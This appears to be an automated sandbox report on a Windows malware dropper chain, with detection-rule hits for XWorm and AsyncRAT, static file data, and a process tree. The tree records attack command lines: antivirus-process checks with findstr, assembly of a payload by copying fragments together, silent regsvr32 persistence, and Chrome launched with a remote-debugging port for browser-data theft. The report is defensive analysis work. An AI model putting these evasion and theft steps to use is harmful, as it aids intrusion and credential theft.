Source: 42.2.regsvr32.exe.256131e.2.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 42.2.regsvr32.exe.256131e.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000002A.00000002.4193180482.0000000002560000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000002A.00000002.4185157711.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000007.00000002.2718587583.000000000A010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 0000002A.00000002.4309071983.000000001B910000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 0000002A.00000002.4191598560.0000000002530000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 0000002A.00000002.4191598560.0000000002530000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: 2E02vIiMfd.exe	Static PE information: Section: ZLIB complexity 0.998073484332425
Source: 2E02vIiMfd.exe	Static PE information: Section: lzqzkbgd ZLIB complexity 0.9941194145927602
Source: skotes.exe.0.dr	Static PE information: Section: ZLIB complexity 0.998073484332425
Source: skotes.exe.0.dr	Static PE information: Section: lzqzkbgd ZLIB complexity 0.9941194145927602
Source: random[1].exe.6.dr	Static PE information: Section: .reloc ZLIB complexity 1.002685546875
Source: d1d4560504.exe.6.dr	Static PE information: Section: .reloc ZLIB complexity 1.002685546875
Source: random[3].exe.6.dr	Static PE information: Section: .reloc ZLIB complexity 1.002685546875
Source: fb2bfd0ee0.exe.6.dr	Static PE information: Section: .reloc ZLIB complexity 1.002685546875
Source: random[1].exe1.6.dr	Static PE information: Section: .bsS ZLIB complexity 1.000333021313364
Source: 2328527160.exe.6.dr	Static PE information: Section: .bsS ZLIB complexity 1.000333021313364
Source: random[4].exe.6.dr	Static PE information: Section: ynbkfsqm ZLIB complexity 0.9899906594602438
Source: random[2].exe.6.dr	Static PE information: Section: ZLIB complexity 1.0003450315457414
Source: random[2].exe.6.dr	Static PE information: Section: nktzncmi ZLIB complexity 0.9942819393382353
Source: 8a7032211b.exe.6.dr	Static PE information: Section: ZLIB complexity 1.0003450315457414
Source: 8a7032211b.exe.6.dr	Static PE information: Section: nktzncmi ZLIB complexity 0.9942819393382353
Source: cf666bd85d.exe.6.dr	Static PE information: Section: ynbkfsqm ZLIB complexity 0.9899906594602438
Source: random[2].exe1.6.dr	Static PE information: Section: ZLIB complexity 1.0001273777173914
Source: random[2].exe1.6.dr	Static PE information: Section: qqtrmnsk ZLIB complexity 0.9945222034590261
Source: 714ab8b5fd.exe.6.dr	Static PE information: Section: ZLIB complexity 1.0001273777173914
Source: 714ab8b5fd.exe.6.dr	Static PE information: Section: qqtrmnsk ZLIB complexity 0.9945222034590261
Source: random[3].exe2.6.dr	Static PE information: Section: .bsS ZLIB complexity 0.9972399855212355
Source: 14484258fa.exe.6.dr	Static PE information: Section: .bsS ZLIB complexity 0.9972399855212355

Source: 8a7032211b.exe.6.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: random[2].exe.6.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: random[1].exe1.6.dr, WS36uhldRk15BMqR9l.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 2328527160.exe.6.dr, WS36uhldRk15BMqR9l.cs	Cryptographic APIs: 'CreateDecryptor'
Source: random[3].exe2.6.dr, WS36uhldRk15BMqR9l.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 14484258fa.exe.6.dr, WS36uhldRk15BMqR9l.cs	Cryptographic APIs: 'CreateDecryptor'

Source: random[1].exe1.6.dr, Program.cs	Base64 encoded string: 'YzMyMTVmZTM3MmQwNWZjMDkxNzY2NTRiZGEyYzhhMDIyZjY2ZTg1MDBkN2U4OWNmYTliM2NmNTkzYjY5MjVmZQ=='
Source: 2328527160.exe.6.dr, Program.cs	Base64 encoded string: 'YzMyMTVmZTM3MmQwNWZjMDkxNzY2NTRiZGEyYzhhMDIyZjY2ZTg1MDBkN2U4OWNmYTliM2NmNTkzYjY5MjVmZQ=='
Source: random[3].exe2.6.dr, Program.cs	Base64 encoded string: 'YzMyMTVmZTM3MmQwNWZjMDkxNzY2NTRiZGEyYzhhMDIyZjY2ZTg1MDBkN2U4OWNmYTliM2NmNTkzYjY5MjVmZQ=='
Source: 14484258fa.exe.6.dr, Program.cs	Base64 encoded string: 'YzMyMTVmZTM3MmQwNWZjMDkxNzY2NTRiZGEyYzhhMDIyZjY2ZTg1MDBkN2U4OWNmYTliM2NmNTkzYjY5MjVmZQ=='

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@108/152@45/16

Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com

Code function: 20_2_004841FA GetLastError,FormatMessageW,

20_2_004841FA

Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Code function: 20_2_00472010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		20_2_00472010
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Code function: 20_2_00471A0B AdjustTokenPrivileges,CloseHandle,		20_2_00471A0B

Source: C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe

8_2_004044D1

Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com

Code function: 20_2_0047DD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

20_2_0047DD87

Source: C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe

Code function: 8_2_004024FB CoCreateInstance,

8_2_004024FB

Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com

Code function: 20_2_00483A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

20_2_00483A0E

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1053884001\14484258fa.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:732:120:WilError_03
Source: C:\Windows\System32\regsvr32.exe	Mutant created: \Sessions\1\BaseNamedObjects\AverageHorse
Source: C:\Windows\System32\regsvr32.exe	Mutant created: \Sessions\1\BaseNamedObjects\f35pmRFzPiiasEf1
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6356:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1888
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d

Source: C:\Users\user\Desktop\2E02vIiMfd.exe

File created: C:\Users\user\AppData\Local\Temp\abc3bc1985

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1053883001\ac911b4662.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-PAS4F.tmp\ac911b4662.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\1053883001\ac911b4662.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-ADPLF.tmp\ac911b4662.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\2E02vIiMfd.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\2E02vIiMfd.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-GBSQT.tmp\c90cec6187.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization

Source: crossplatformplayer.exe, 00000024.00000003.2719574372.0000000000963000.00000004.00000020.00020000.00000000.sdmp, crossplatformplayer.exe, 00000024.00000002.4202562046.000000006096F000.00000002.00000001.01000000.00000019.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: crossplatformplayer.exe, 00000024.00000003.2719574372.0000000000963000.00000004.00000020.00020000.00000000.sdmp, crossplatformplayer.exe, 00000024.00000002.4202562046.000000006096F000.00000002.00000001.01000000.00000019.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: crossplatformplayer.exe, 00000024.00000003.2719574372.0000000000963000.00000004.00000020.00020000.00000000.sdmp, crossplatformplayer.exe, 00000024.00000002.4202562046.000000006096F000.00000002.00000001.01000000.00000019.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: crossplatformplayer.exe, 00000024.00000003.2719574372.0000000000963000.00000004.00000020.00020000.00000000.sdmp, crossplatformplayer.exe, 00000024.00000002.4202562046.000000006096F000.00000002.00000001.01000000.00000019.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
Source: crossplatformplayer.exe, 00000024.00000003.2719574372.0000000000963000.00000004.00000020.00020000.00000000.sdmp, crossplatformplayer.exe, 00000024.00000002.4202562046.000000006096F000.00000002.00000001.01000000.00000019.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: crossplatformplayer.exe, 00000024.00000003.2719574372.0000000000963000.00000004.00000020.00020000.00000000.sdmp, crossplatformplayer.exe, 00000024.00000002.4202562046.000000006096F000.00000002.00000001.01000000.00000019.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: crossplatformplayer.exe, 00000024.00000003.2719574372.0000000000963000.00000004.00000020.00020000.00000000.sdmp, crossplatformplayer.exe, 00000024.00000002.4202562046.000000006096F000.00000002.00000001.01000000.00000019.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: crossplatformplayer.exe, 00000024.00000003.2719574372.0000000000963000.00000004.00000020.00020000.00000000.sdmp, crossplatformplayer.exe, 00000024.00000002.4202562046.000000006096F000.00000002.00000001.01000000.00000019.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: crossplatformplayer.exe, 00000024.00000003.2719574372.0000000000963000.00000004.00000020.00020000.00000000.sdmp, crossplatformplayer.exe, 00000024.00000002.4202562046.000000006096F000.00000002.00000001.01000000.00000019.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: crossplatformplayer.exe, 00000024.00000003.2719574372.0000000000963000.00000004.00000020.00020000.00000000.sdmp, crossplatformplayer.exe, 00000024.00000002.4202562046.000000006096F000.00000002.00000001.01000000.00000019.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: crossplatformplayer.exe, 00000024.00000003.2719574372.0000000000963000.00000004.00000020.00020000.00000000.sdmp, crossplatformplayer.exe, 00000024.00000002.4202562046.000000006096F000.00000002.00000001.01000000.00000019.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 8a7032211b.exe, 0000001D.00000003.2708988309.00000000056E9000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.2673115363.0000000004CC0000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.2700043050.0000000004CC2000.00000004.00000800.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2762220411.0000000005D01000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: crossplatformplayer.exe, 00000024.00000003.2719574372.0000000000963000.00000004.00000020.00020000.00000000.sdmp, crossplatformplayer.exe, 00000024.00000002.4202562046.000000006096F000.00000002.00000001.01000000.00000019.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: 2E02vIiMfd.exe	Virustotal: Detection: 62%
Source: 2E02vIiMfd.exe	ReversingLabs: Detection: 63%

Source: 2E02vIiMfd.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\2E02vIiMfd.exe

File read: C:\Users\user\Desktop\2E02vIiMfd.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\2E02vIiMfd.exe "C:\Users\user\Desktop\2E02vIiMfd.exe"
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1053875001\c3d996d758.exe "C:\Users\user\AppData\Local\Temp\1053875001\c3d996d758.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe "C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe"
Source: C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Fixed Fixed.cmd & Fixed.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 567757
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Activation
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "VIETNAM" Diagnostic
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 567757\Appeal.com + Entirely + Thumbnails + Atmospheric + Eternal + Quite + Strictly + Mongolia + Card + Decent 567757\Appeal.com
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Tuner + ..\Rest + ..\Reservation + ..\Twiki j
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\567757\Appeal.com Appeal.com j
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe "C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe"
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Process created: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe "C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe"
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Process created: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe "C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1888 -ip 1888
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1888 -s 948
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1053878001\abd4306087.exe "C:\Users\user\AppData\Local\Temp\1053878001\abd4306087.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe "C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe"
Source: C:\Users\user\AppData\Local\Temp\1053875001\c3d996d758.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1053880001\a58cbe76b9.exe "C:\Users\user\AppData\Local\Temp\1053880001\a58cbe76b9.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe "C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1053882001\c90cec6187.exe "C:\Users\user\AppData\Local\Temp\1053882001\c90cec6187.exe"
Source: C:\Users\user\AppData\Local\Temp\1053882001\c90cec6187.exe	Process created: C:\Users\user\AppData\Local\Temp\is-GBSQT.tmp\c90cec6187.tmp "C:\Users\user\AppData\Local\Temp\is-GBSQT.tmp\c90cec6187.tmp" /SL5="$100068,3422545,56832,C:\Users\user\AppData\Local\Temp\1053882001\c90cec6187.exe"
Source: C:\Users\user\AppData\Local\Temp\is-GBSQT.tmp\c90cec6187.tmp	Process created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe "C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe" -i
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1053883001\ac911b4662.exe "C:\Users\user\AppData\Local\Temp\1053883001\ac911b4662.exe"
Source: C:\Users\user\AppData\Local\Temp\1053883001\ac911b4662.exe	Process created: C:\Users\user\AppData\Local\Temp\is-PAS4F.tmp\ac911b4662.tmp "C:\Users\user\AppData\Local\Temp\is-PAS4F.tmp\ac911b4662.tmp" /SL5="$2043A,1104885,161792,C:\Users\user\AppData\Local\Temp\1053883001\ac911b4662.exe"
Source: C:\Users\user\AppData\Local\Temp\is-PAS4F.tmp\ac911b4662.tmp	Process created: C:\Users\user\AppData\Local\Temp\1053883001\ac911b4662.exe "C:\Users\user\AppData\Local\Temp\1053883001\ac911b4662.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\1053883001\ac911b4662.exe	Process created: C:\Users\user\AppData\Local\Temp\is-ADPLF.tmp\ac911b4662.tmp "C:\Users\user\AppData\Local\Temp\is-ADPLF.tmp\ac911b4662.tmp" /SL5="$30440,1104885,161792,C:\Users\user\AppData\Local\Temp\1053883001\ac911b4662.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-ADPLF.tmp\ac911b4662.tmp	Process created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\uxtheme_2.drv"
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\System32\regsvr32.exe /s /i:SYNC "C:\Users\user\AppData\Roaming\\uxtheme_2.drv"
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask \| Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2452 --field-trial-handle=2192,i,17195581818120426655,15686609209049494560,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\1053880001\a58cbe76b9.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1053884001\14484258fa.exe "C:\Users\user\AppData\Local\Temp\1053884001\14484258fa.exe"
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1053875001\c3d996d758.exe "C:\Users\user\AppData\Local\Temp\1053875001\c3d996d758.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe "C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe "C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1053878001\abd4306087.exe "C:\Users\user\AppData\Local\Temp\1053878001\abd4306087.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe "C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1053880001\a58cbe76b9.exe "C:\Users\user\AppData\Local\Temp\1053880001\a58cbe76b9.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe "C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1053882001\c90cec6187.exe "C:\Users\user\AppData\Local\Temp\1053882001\c90cec6187.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1053883001\ac911b4662.exe "C:\Users\user\AppData\Local\Temp\1053883001\ac911b4662.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1053884001\14484258fa.exe "C:\Users\user\AppData\Local\Temp\1053884001\14484258fa.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\is-ADPLF.tmp\ac911b4662.tmp "C:\Users\user\AppData\Local\Temp\is-ADPLF.tmp\ac911b4662.tmp" /SL5="$30440,1104885,161792,C:\Users\user\AppData\Local\Temp\1053883001\ac911b4662.exe" /VERYSILENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053875001\c3d996d758.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Fixed Fixed.cmd & Fixed.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"	Jump to behavior
